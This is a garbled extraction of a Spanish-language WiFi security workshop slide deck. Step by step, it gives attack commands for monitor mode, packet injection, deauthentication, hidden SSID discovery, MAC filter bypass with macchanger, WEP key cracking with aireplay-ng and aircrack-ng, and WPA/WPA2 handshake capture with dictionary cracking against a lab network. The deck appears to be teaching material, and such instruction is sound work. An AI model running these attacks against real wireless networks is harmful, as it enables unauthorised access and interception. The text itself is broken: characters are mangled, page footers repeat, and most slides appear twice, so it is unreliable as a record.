7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
